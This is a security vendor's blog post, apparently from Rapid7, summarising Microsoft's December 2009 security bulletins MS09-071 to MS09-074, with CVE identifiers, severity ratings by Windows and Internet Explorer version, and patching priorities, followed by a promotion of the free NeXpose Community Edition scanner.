MS09-071: Rated Critical. Potential Remote Code Execution and Elevation of Privilege in Internet Authentication Service, covering 2 vulnerabilities: CVE-2009-2505 (Protected Extensible Authentication Protocol) and CVE-2009-3677 (Challenge Handshake Authentication Protocol version 2). The CHAP-2 vulnerability allows Elevation of Privilege across all supported Windows versions except Windows 7 and Server 2008 R2. The PEAP exposure only affects Vista and Server 2008 when configured to use PEAP with CHAP-2 authentication. Important to note that IAS is Microsoft’s version of a RADIUS proxy and server, and PEAP provides authentication for 802.1x wireless clients, so this exposure presents a real risk for client-side wireless attacks.

MS09-072: Rated Critical. Potential Remote Code Execution in Internet Explorer 5.01, 6, 7, and 8, covering 5 vulnerabilities: CVE-2009-2493 (ATL COM Initialization), CVE-2009-3671 (Uninitialized Memory Corruption), CVE-2009-3672 (HTML Object Memory Corruption), CVE-2009-3673 (Uninitialized Memory Corruption), and CVE-2009-3674 (Uninitialized Memory Corruption). This one needs a little more explanation to lay out what severity ratings map to what:

BY IE VERSION
- IE 5.01 & 6 are rated Critical on Windows 2000
- IE 6, 7, & 8 are rated Critical on XP
- IE 6 is rated Critical, IE 7 & 8 are rated Moderate on Server 2003
- IE 7 & 8 are rated Critical on Vista
- IE 7 & 8 are rated Moderate on Server 2008
- IE 8 is rated Moderate on Server 2008 R2
- IE 8 is rated Critical on Windows 7

BY VULNERABILITY
- CVE-2009-2493:
  - Critical for IE 5.01 on Windows 2000
  - Critical for IE 6 on Windows 2000, XP, and 2003

- CVE-2009-3671:
  - Critical for IE 8 on XP, Vista, and Windows 7
  - Moderate for IE 8 on 2003 and 2008

- CVE-2009-3672:
  - Critical for IE 6 on Windows 2000 and XP
  - Critical for IE 7 on XP and Vista
  - Moderate for IE 6 on 2003
  - Moderate for IE 7 on 2003 and 2008

- CVE-2009-3673:
  - Critical for IE 7 on XP and Vista
  - Critical for IE 8 on XP, Vista, and Windows 7
  - Moderate for IE 7 on 2003 and 2008
  - Moderate for IE 8 on 2003, 2008, and 2008 R2

- CVE-2009-3674:
  - Critical for IE 8 on XP, Vista, and Windows 7
  - Moderate for IE 8 on 2003, 2008, and 2008 R2

MS09-073: Rated Important. Potential Remote Code Execution via Word 97 file conversion, affecting Windows 2000, XP, and 2003, Works 8.5/WordPad, Word 2002, Word 2003, and Office Converter Pack, covering 1 vulnerability: CVE-2009-2506. It’s fun to see WordPad implicated in a vulnerability, but this one is not at the top of the priority list for this month.

MS09-074: Rated Important. Potential Remote Code Execution via XXXX affecting MS Project, covering 1 vulnerability: CVE-2009-0102. Important to note that this one is only Critical for Project 2000; rated Important for Project 2002 and 2003. While the Impact of this vulnerability is real, the likelihood of successful, widespread attacks against Project is pretty slim (let alone successful attacks against Project 2000). These are not typically externally facing systems and are not as widely deployed as Operating Systems, Standard Office components, etc.

So … patch IE, patch Internet Authentication Server, and prioritize the rest based on your environment and testing/deployment schedule.

NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect this vulnerability and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!
